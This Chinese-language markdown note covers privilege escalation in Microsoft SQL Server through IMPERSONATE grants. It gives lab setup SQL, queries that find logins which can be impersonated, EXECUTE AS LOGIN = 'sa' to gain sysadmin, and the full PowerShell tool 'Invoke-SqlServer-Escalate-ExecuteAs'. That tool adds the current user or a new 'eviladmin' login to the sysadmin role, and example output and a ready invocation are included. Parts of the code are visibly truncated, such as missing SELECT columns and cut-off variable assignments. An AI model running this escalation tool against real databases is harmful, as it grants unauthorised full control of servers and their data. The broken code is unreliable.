    Mssql 模拟登录提权.md
    16.31 KB / 2021-07-15 19:57:08
        Mssql 模拟登录提权
    0x01 前提
    0x02 复现
    #### 1.sa用户登录创建4个用户
        -- Create login 1
        CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!';
        -- Create login 2
        CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!';
        -- Create login 3
        CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!';
        -- Create login 4
        CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!';
    #### 2.赋予用户MyUser1权限来模拟 MyUser2, MyUser3,及sa
        USE master;
        GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
        GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
        GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
    在SQL Server的安全模型中,模拟(IMPERSONATE
        GRANT IMPERSONATE ON USER:: user2 TO user1;
    通过执行EXECUTE AS
        EXECUTE AS USER = 'user2';
    #### 3.查找可以模拟登录的用户
        SELECT distinct
        FROM sys.server_permissions a
        INNER JOIN sys.server_principals b
        ON a.grantor_principal_id = b.principal_id
        WHERE a.permission_name = 'IMPERSONATE'
    #### 4.模拟SQL Server用户登陆
        -- 验证是否为sysadmin权限
        SELECT IS_SRVROLEMEMBER('sysadmin')
        -- 模拟sa登录
        EXECUTE AS LOGIN = 'sa'
        -- 验证是否为sysadmin权限
        SELECT IS_SRVROLEMEMBER('sysadmin')
        SELECT * FROM master.sys.sysusers
        WHERE islogin = 1
    #### 5.回到原来的登录
        SELECT IS_SRVROLEMEMBER('sysadmin')
    0x03 工具化
    > 当然这个也可以用powershell一键实现
    ### poc
    > Invoke-SqlServer-Escalate-ExecuteAs.psm1
        function Invoke-SqlServer-Escalate-ExecuteAs
            This script can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user.
            In most cases this results in additional data access, but in some cases it can be used to gain sysadmin
            privileges.  This script can also be used to add a new sysadmin instead of escalating the privileges of
            the existing user.  
            Adding the current user to the syadmin role if the user has permissions to impersonate the sa account.
            PS C:\> Invoke-SqlServer-Escalate-ExecuteAs -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance SQLServer1\SQLEXPRESS
            [*] Attempting to Connect to SQLServer\SQLEXPRESS as myappuser...
            [*] Connected.
            [*] Enumerating users that myappuser can impersonate...
            [*] 3 accounts can be impersonated:
            [*] - user2
            [*] - superuser
            [*] - sa
            [*] Checking if any of are sysadmins...
            [*] - user2 - NOT sysadmin
            [*] - superuser - NOT sysadmin
            [*] - sa - sysadmin!
            [*] Attempting to add myappuser to the sysadmin role via impersonation...
            [*] Verifying that myappuser was added to the sysadmin role...
            [*] Success! - myappuser is now a sysadmin.
            [*] All done.
            Creating a new sysadmin as a user with permissions to impersonate the sa account.
            PS C:\> Invoke-SqlServer-Escalate-ExecuteAs -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance SQLServer1\SQLEXPRESS -NewUser eviladmin -NewPass MyPassword!
            [*] Attempting to Connect to SQLServer\SQLEXPRESS as myappuser...
            [*] Connected.
            [*] Enumerating users that myappuser can impersonate...
            [*] 3 accounts can be impersonated:
            [*] - user2
            [*] - superuser
            [*] - sa
            [*] Checking if any of are sysadmins...
            [*] - user2 - NOT sysadmin
            [*] - superuser - NOT sysadmin
            [*] - sa - sysadmin!
            [*] Attempting to create and add eviladmin to the sysadmin role via impersonation...
            [*] Verifying that eviladmin was added to the sysadmin role...
            [*] Success! - eviladmin is now a sysadmin.
            [*] All done.
               Author: Scott Sutherland - 2014, NetSPI
               Version: Invoke-SqlServer-Escalate-ExecuteAs.psm1 v1.0
               Comments: This should work on SQL Server 2005 and Above.
            fix double run bug
            fix alternative creds connection use
            HelpMessage='Set SQL Login username.')]
            HelpMessage='Set SQL Login password.')]
            HelpMessage='Set SQL Login username.')]
            HelpMessage='Set SQL Login password.')]
            HelpMessage='Execute query under impersonated user context.')]
            HelpMessage='Set target SQL Server instance.')]
            # -----------------------------------------------
            # Setup database connection string
            # -----------------------------------------------
            # Create fun connection object
            $conn = New-Object System.Data.SqlClient.SqlConnection
            # Set authentication type and create connection string
                # SQL login / alternative domain credentials
                 Write-Output "[*] Attempting to authenticate to $SqlServerInstance with SQL login $SqlUser..."
                $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;User ID=$SqlUser;Password=$SqlPass;"
                [string]$ConnectUser = $SqlUser
                # Trusted connection
                Write-Output "[*] Attempting to authenticate to $SqlServerInstance as the current Windows user..."
                $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;Integrated Security=SSPI;"   
                $UserDomain = [Environment]::UserDomainName
                $Username = [Environment]::UserName
                $ConnectUser = "$UserDomain\$Username"                    
            # -----------------------------------------------
            # Test database connection
            # -----------------------------------------------
                Write-Host "[*] Connected." -foreground "green"
                $ErrorMessage = $_.Exception.Message
                Write-Host "[*] Connection failed" -foreground "red"
                Write-Host "[*] Error: $ErrorMessage" -foreground "red"  
            # -----------------------------------------------
            # Check if the user is already a sysadmin
            # -----------------------------------------------
            # Open db connection
            # Setup query
            $Query = "select is_srvrolemember('sysadmin') as sysstatus"
            # Execute query
            $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn)
            $results = $cmd.ExecuteReader() 
            # Parse query results
            $TableIsSysAdmin = New-Object System.Data.DataTable
            # Check if current user is a sysadmin
            $TableIsSysAdmin | Select-Object -First 1 sysstatus | foreach {
                $Checksysadmin = $_.sysstatus
                if ($Checksysadmin -ne 0){
                        Write-Host "[*] You're already a sysadmin - no escalation needed." -foreground "green"
                        Write-Host "[*] All Done."
            # Close db connection
            # -----------------------------------------------
            # Get a list of the users that can be impersonated
            # -----------------------------------------------     
            # User status
            Write-Host "[*] Enumerating a list of users that can be impersonated..."  
            # Open db connection
            # Setup query
            $QueryDatabases = "SELECT DISTINCT
            FROM sys.server_permissions a
            INNER JOIN sys.server_principals b
            ON a.grantor_principal_id = b.principal_id 
            WHERE a.permission_name = 'IMPERSONATE'"
            # Execute query    
            $cmd = New-Object System.Data.SqlClient.SqlCommand($QueryDatabases,$conn)
            $results = $cmd.ExecuteReader()
            # Parse query results
            $TableImpUsers = New-Object System.Data.DataTable 
            # Check if any users can be impersonated
            if ($TableImpUsers.rows.count -eq 0){
            # Status user
            Write-Host "[*] Sorry, the current user doesn't have permissions to impersonate anyone." -foreground "red"
                Write-Host "[*] All done." 
                # Status user   
            $ImpUserCount = $TableImpUsers.rows.count      
            Write-Host "[*] Found $ImpUserCount users that can be impersonated:" 
            # Display users
                $TableImpUsers | foreach{
                    $ImpUser = $
                    Write-Host "[*] - $ImpUser"
            # Close db connection
            # ----------------------------------------------------------------
            # Check if any of the users that can be impersonated are sysadmins
            # ----------------------------------------------------------------
            if ($TableImpUsers.rows.count -ne 0){   
                # Status user
                Write-Host "[*] Checking if any of them are sysadmins..."
                # Setup data table to store list of sysadmins that can be impersonated
                $TableImpUserSysAdmins = New-Object System.Data.DataTable
                $TableImpUserSysAdmins.Columns.Add('name') | Out-Null
                $TableImpUsers | foreach {
                    # Open db connection
                    # Setup query
                    $ImpUser = $
                    $Query = "select IS_SRVROLEMEMBER('sysadmin','$ImpUser') as status"
                    # Execute query
                $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn)
                $results = $cmd.ExecuteReader()             
                    # Parse query results
                    $TableImpUserSysAdminsCheck = New-Object System.Data.DataTable 
                    $TableImpUserSysAdminsCheck | foreach{
                    $SysAdminStatus = $_.status
                    # Check if the impersonatable user is a sysadmin
                    if ($SysAdminStatus -eq 0){
                        Write-Host "[*] - $ImpUser - NOT sysadmin" 
                        Write-Host "[*] - $ImpUser - sysadmin!" -foreground "green"
                        # Add to data table
                        $TableImpUserSysAdmins.Rows.Add($ImpUser) | Out-Null     
                   # Clear check
                   # Close db connection
            # -------------------------------------------------
            # Attempt to escalate privileges
            # -------------------------------------------------
            # Verify that a sysadmin user can be impersonated
            $ImpUserSysadminsCount = $TableImpUserSysAdmins.rows.count 
            if ($ImpUserSysadminsCount -ne 0) {        
                # Open db connection
                # Check if we are going to add a new sysadmin or elevate the current one for query
                if ($newuser -and $newPass){
                    $AddUser = "CREATE LOGIN $newuser WITH PASSWORD = '$newPass'"
                    $UsertoElevate = $newuser
                    $Message = " create and"
                    $AddUser = ""
                    $UsertoElevate = $ConnectUser
                    $Message = ""
                # Status user
                Write-Host "[*] Attempting to$Message add $UsertoElevate to the sysadmin role via impersonation..."
                # Get the sysadmin user that can be impersonated
                $TableImpUserSysAdmins | foreach {
                    $ImpUser = $
                # Setup query
                $Query = "EXECUTE AS Login = '$ImpUser';
                EXEC sp_addsrvrolemember '$UsertoElevate','sysadmin';
                SELECT IS_SRVROLEMEMBER('sysadmin','$UsertoElevate') as status;"
                # Execute query
                $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn)
                $results = $cmd.ExecuteReader() 
                # Status user
                Write-Host "[*] Verifying that $UsertoElevate was added to the sysadmin role..."
                # Parse query results
                $TableVerify = New-Object System.Data.DataTable
                # Check if user is a sysadmin
                $TableVerify| Select-Object -First 1 status | foreach {
                    $VerifySysadmin = $_.status
                    if ($VerifySysadmin -eq 1){
                        Write-Host "[*] Success - $UsertoElevate is now a sysadmin!" -foreground "green"
                        Write-Host "[*] All Done."          
                        Write-Host "[*] Failed - Something went wrong!." -foreground "red"
                        Write-Host "[*] All Done."
                # Close db connection
                 Write-Host "[*] Sorry, the $ConnectUser account can't impersonate any sysadmins." -foreground "red" 
                 Write-Host "[*] All done." 
        Invoke-SqlServer-Escalate-ExecuteAs -SqlUser MyUser1 -SqlPass MyPassword! -SqlServerInstance WIN-80LVKKRM5UA